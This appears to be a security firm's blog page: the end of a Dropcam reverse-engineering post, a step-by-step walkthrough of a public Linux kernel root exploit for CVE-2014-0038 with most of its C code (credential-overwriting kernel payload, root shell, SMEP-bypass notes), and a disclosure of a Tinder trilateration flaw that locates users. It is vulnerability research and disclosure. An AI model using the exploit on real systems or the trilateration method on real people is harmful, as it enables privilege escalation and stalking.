Something that users should be aware of is that this approach requires users to upload their network password to the dropcam.com server, and it might not be clear to a non-technical user that they are doing this. Dropcam (the company) probably isn't doing anything directly with the transmitted WiFi encryption passwords, but there's no guarantee that an attacker who could compromise the Dropcam cloud servers wouldn't. It's always a good practice to avoid sending confidential data to the cloud instead of making the setup binary directly communicate the WiFi information to the camera, so we're not sure if there is some other product architecture reason to do this that we're not aware of.

Further exploring the encrypted connections

The Dropcam makes two outgoing TLS connections over the USB tunnel. The first is to nexus.dropcam.com; that connection directs the camera to connect to an “oculus” server; my Dropcam connected to oculus101.dropcam.com. The camera itself makes the same two TLS connections over WiFi once it is configured; a short connection to nexus.dropcam.com followed by a long-term connection to an “oculus” server. The long-term connection is used for all of the camera's communications including streaming video, configuration changes, and firmware updates.

After understanding how the Dropcam tunnels its TLS connections out over the mass storage interface, the next step was to attempt a man-in-the-middle attack on the TLS connections in order to capture their contents. However, the TLS connections utilize both client and server side certificate verification - when making the outgoing TLS connections, the Dropcam checks the server's certificate, and the server also checks the Dropcam's client certificate. Since the TLS connection endpoint is on the camera itself (not in the setup binary), I wasn't able to inspect the contents of the TLS connection until after I'd taken the Dropcam apart, which I'll describe in our next Dropcam blog post.

Follow us on twitter @IncludeSecurity and check this blog again next week for subsequent posts in this Reverse Engineering series.

Thursday, March 6, 2014

How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038

On January 31st 2014 a post appeared on oss-seclist [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long until the first exploits appeared, in this blog post we'll walk-through the vulnerability and Samuel's Proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear the x32 ABI (not to be confused with the X86 ABI) is a particular ABI and that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux ones have enabled it. For more details on the x32 ABI refer to [2]. In short x32 is an ABI which takes advantage of the 64-bit environment while using 32bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64bit applications by setting adding the value of __X32_SYSCALL_BIT to 64bit system call numbers.

The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct compat_timespec __user *timeout) { int datagrams; struct timespec ktspec; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */ return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, (struct timespec *) timeout); /* ... */
Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg, unsigned int, vlen, unsigned int, flags, struct timespec __user *, timeout) { int datagrams; struct timespec timeout_sys; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (!timeout) return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL); /* -1- */ if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys))) return -EFAULT; datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys); if (datagrams > 0 && copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys))) datagrams = -EFAULT; return datagrams; }
At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec { long tv_sec; /* seconds */ long tv_nsec; /* nanoseconds */ };
Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct timespec *timeout) { if (timeout && /* -1- */ poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec)) return -EINVAL; /* ... */ while (datagrams < vlen) { /* -2- */ /* * Basically just a loop calling recvmsg * until the timeout is hit or vlen messages have * been received. */ if (MSG_CMSG_COMPAT & flags) { err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); /* ... */ } else { err = ___sys_recvmsg(sock, (struct msghdr __user *)entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); /* ... */ } /* ... */ if (timeout) { ktime_get_ts(timeout); // put current time into *timeout // then subtract that from end_time *timeout = timespec_sub(end_time, *timeout); /* -3- */ if (timeout->tv_sec < 0) { timeout->tv_sec = timeout->tv_nsec = 0; /* -4- */ break; } /* Timeout, return less than vlen datagrams */ if (timeout->tv_nsec == 0 && timeout->tv_sec == 0) break; } /* ... */
The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts) { /* Dates before 1970 are bogus */ if (ts->tv_sec < 0) /* -5- */ return false; /* Can't have more nanoseconds then a second */ if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) /* -6- */ // include/linux/time.h: #define NSEC_PER_SEC 1000000000L return false; return true; }
At -5- the first long, tv_sec, is checked to be a positive number, meaning it's most significant byte must be smaller than 0x8, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be between 0 and 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by __sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since kernel pointers always have the high 4 bytes set to 0xff they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241               uninitialized data
     (little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:
  • Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.
  • Target the release function pointer of the ptmx_fops structure located in the .data  section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
  • Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
  • Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved, those are

#define PTMX_FOPS 0xffffffff81fb30c0LL #define TTY_RELEASE 0xffffffff8142fec0LL #define COMMIT_CREDS 0xffffffff8108ad40LL #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which will help resolving with the symbols. The README in the PoC provides details on how to use it.

Setting things up

/* Prepare payload... */ printf("preparing payload buffer...\n"); code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0); memset((void*)code, 0x90, PAYLOADSIZE); code += PAYLOADSIZE - 1024; memcpy((void*)code, &kernel_payload, 1024);
The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.

The target

/* * Now clear the three most significant bytes of the fops pointer * to the release function. * This will make it point into the memory region mapped above. */ printf("changing kernel pointer to point into controlled buffer...\n"); target = PTMX_FOPS + FOPS_RELEASE_OFFSET; for (i = 0; i < 3; i++) { pids[i] = fork(); if (pids[i] == 0) { zero_out(target + (5 + i)); exit(EXIT_SUCCESS); } sleep(1); }
The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)

Exploiting the bug

void zero_out(long addr) { int sockfd, retval, port, pid, i; struct sockaddr_in sa; char buf[BUFSIZE]; struct mmsghdr msgs; struct iovec iovecs; srand(time(NULL)); port = 1024 + (rand() % (0x10000 - 1024)); sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(EXIT_FAILURE); } memset(&msgs, 0, sizeof(msgs)); iovecs.iov_base = buf; iovecs.iov_len = BUFSIZE; msgs.msg_hdr.msg_iov = &iovecs; msgs.msg_hdr.msg_iovlen = 1; /* * start a separate process to send a UDP message after 255 seconds so the syscall returns, * but not after updating the timeout struct and writing the remaining time into it. * 0xff - 255 seconds = 0x00 */ printf("clearing byte at 0x%lx\n", addr); pid = fork(); if (pid == 0) { memset(buf, 0x41, BUFSIZE); if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); sleep(0xfe); printf("waking up parent...\n"); sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); /* -1- */ exit(EXIT_SUCCESS); } else if (pid > 0) { retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); /* -2- */ if (retval == -1) { printf("address can't be written to, not a valid timespec struct!\n"); exit(EXIT_FAILURE); } waitpid(pid, 0, 0); printf("byte zeroed out\n"); } else { perror("fork()"); exit(EXIT_FAILURE); } }
This is the key part of the exploit, we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the least significant byte of the timeout pointer (-2-) and the vulnerable syscall is called.
At -2- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1
Turning it into:
     release pointer               mangled                  mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
ptmx_fops->release now points into the memory region that was mapped at the beginning.

Code execution in Ring 0

/* ... and trigger. */ printf("releasing file descriptor to call manipulated pointer in kernel mode...\n"); pwn = open("/dev/ptmx", 'r'); close(pwn);
At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3))) kernel_payload(void* foo, void* bar) { _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; /* restore function pointer and following two longs */ *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0; *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0; /* escalate to root */ commit_creds(prepare_kernel_cred(0)); return -1; }
This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].

Finishing

if (getuid() != 0) { printf("failed to get root :(\n"); exit(EXIT_FAILURE); } printf("got root, enjoy :)\n"); return execl("/bin/bash", "-sh", NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte and this guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes 3 times longer as the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

The original non-threaded version of this exploit in theory works reliably vs. the threaded version, but does take a while to execute.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP the 20th bit of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register exploitation would still be possible by writing the payload in ROP entirely.
Also see the post in [9].

That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038

If you have interesting optimizations or alternative implementations let us know via email info/at\includesecurity.com

References

[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux

Wednesday, February 19, 2014

How I was able to track the location of any Tinder user.

By Max Veytsman
At IncludeSec we specialize in application security assessment for our clients, that means taking applications apart and finding really crazy vulnerabilities before other hackers do. When we have time off from client work we like to analyze popular apps to see what we find. Towards the end of 2013 we found a vulnerability that lets you get exact latitude and longitude co-ordinates for any Tinder user (which has since been fixed)

Tinder is an incredibly popular dating app. It presents the user with photographs of strangers and allows them to "like" or "nope" them. When two people "like" each other, a chat box pops up allowing them to talk. What could be simpler?

Being a dating app, it's important that Tinder shows you attractive singles in your area. To that end, Tinder tells you how far away potential matches are:


Before we continue, a bit of history: In July 2013, a different Privacy vulnerability was reported in Tinder by another security researcher. At the time, Tinder was actually sending latitude and longitude co-ordinates of potential matches to the iOS client. Anyone with rudimentary programming skills could query the Tinder API directly and pull down the co-ordinates of any user.
I'm going to talk about a different vulnerability that's related to how the one described above was fixed. In implementing their fix, Tinder introduced a new vulnerability that's described below.

The API

By proxying iPhone requests, it's possible to get a picture of the API the Tinder app uses. Of interest to us today is the user endpoint, which returns details about a user by id. This is called by the client for your potential matches as you swipe through pictures in the app.
Here's a snippet of the response:
{
   "status":200,
   "results":{
      "bio":"",
      "name":"Anthony",
      "birth_date":"1981-03-16T00:00:00.000Z",
      "gender":0,
      "ping_time":"2013-10-18T18:31:05.695Z",
      "photos":[
      //cut to save space
      ],
      "id":"52617e698525596018001418",
      "common_friends":[

      ],
      "common_likes":[

      ],
      "common_like_count":0,
      "common_friend_count":0,
      "distance_mi":4.760408451724539
   }
}
Tinder is no longer returning exact GPS co-ordinates for its users, but it is leaking some location information that an attack can exploit. The distance_mi field is a 64-bit double. That's a lot of precision that we're getting, and it's enough to do really accurate triangulation!

Triangulation

As far as high-school subjects go, trigonometry isn't the most popular, so I won't go into too many details here. Basically, if you have three (or more) distance measurements to a target from known locations, you can get an absolute location of the target using triangulation1. This is similar in principle to how GPS and cellphone location services work.

I can create a profile on Tinder, use the API to tell Tinder that I'm at some arbitrary location, and query the API to find a distance to a user. When I know the city my target lives in, I create 3 fake accounts on Tinder. I then tell the Tinder API that I am at three locations around where I guess my target is. Then I can plug the distances into the formula on this Wikipedia page.

To make this a bit clearer, I built a webapp....

TinderFinder

Before I go on, this app isn't online and we have no plans on releasing it. This is a serious vulnerability, and we in no way want to help people invade the privacy of others. TinderFinder was built to demonstrate a vulnerability and only tested on Tinder accounts that I had control of.
TinderFinder works by having you input the user id of a target (or use your own by logging into Tinder). The assumption is that an attacker can find user ids fairly easily by sniffing the phone's traffic to find them.
First, the user calibrates the search to a city. I'm picking a point in Toronto, because I will be finding myself.
I can locate the office I sat in while writing the app:
I can also enter a user-id directly:
And find a target Tinder user in NYC
You can find a video showing how the app works in more detail below:

FAQ

Q: What does this vulnerability allow one to do?
A: This vulnerability allows any Tinder user to find the exact location of another tinder user with a very high degree of accuracy (within 100ft from our experiments)
Q: Is this type of flaw specific to Tinder?
A: Absolutely not, flaws in location information handling have been common place in the mobile app space and continue to remain common if developers don't handle location information more sensitively.
Q: Does this give you the location of a user's last sign-in or when they signed up? or is it real-time location tracking?
A: This vulnerability finds the last location the user reported to Tinder, which usually happens when they last had the app open.
Q: Do you need Facebook for this attack to work?
A: While our Proof of concept attack uses Facebook authentication to find the user's Tinder id, Facebook is NOT needed to exploit this vulnerability, and no action by Facebook could mitigate this vulnerability
Q: Is this related to the vulnerability found in Tinder earlier this year?
A: Yes this is related to the same area that a similar Privacy vulnerability was found in July 2013. At the time the application architecture change Tinder made to correct the privacy vulnerability was not correct, they changed the JSON data from exact lat/long to a highly precise distance. Max and Erik from Include Security were able to extract precise location data from this using triangulation.
Q: How did Include Security notify Tinder and what recommendation was given?
A: We have not done research to find out how long this flaw has existed, we believe it is possible this flaw has existed since the fix was made for the previous privacy flaw in July 2013. The team's recommendation for remediation is to never deal with high resolution measurements of distance or location in any sense on the client-side. These calculations should be done on the server-side to avoid the possibility of the client applications intercepting the positional information. Alternatively using low-precision position/distance indicators would allow the feature and application architecture to remain intact while removing the ability to narrow down an exact position of another user.
Q: Is anybody exploiting this? How can I know if somebody has tracked me using this privacy vulnerability?
A: The API calls used in this proof of concept demonstration are not special in any way, they do not attack Tinder's servers and they use data which the Tinder web services exports intentionally. There is no simple way to determine if this attack was used against a specific Tinder user.

Vulnerability Disclosure Timeline

  • October 23rd 2013 - We notified tinder via email to customer service.
  • October 24th 2013 - We notified tinder via email to CEO.
  • October 24th 2013 - Tinder's CEO acknowledges and says thanks.
  • November 8th 2013 - We ask for status from the CEO, no response.
  • December 2nd 2013 - We ask for status from the CEO, we're redirected to a tech team lead.
  • December 2nd 2013 - Tech team lead asks for more time to implement a fix, we acknowledge and agree.
  • January 1st 2014 - We look at the server-side traffic to see if the same issue exists and see that the high precision data is no longer being returned by the server (awesome looks like a fix!)
  • January 2nd 2014 - We ask for fix details/status from the tech team lead, no response.
  • February 4th 2014 - We ask for fix details/status from the tech team lead, no response.
  • February 7th 2014 - We ask for fix details/status from the CEO, get short reply saying they'll get back to us.
  • February 19th 2014 - As the issue does not seem to be reproducible and we have no updates from the vendor....blog post published.

  1. Technically we're doing trilateration. Triangulation involves finding distances when you have angle measurements, but it's used colloquially to mean trilateration as well. If you're so inclined, you can find out more about trilateration here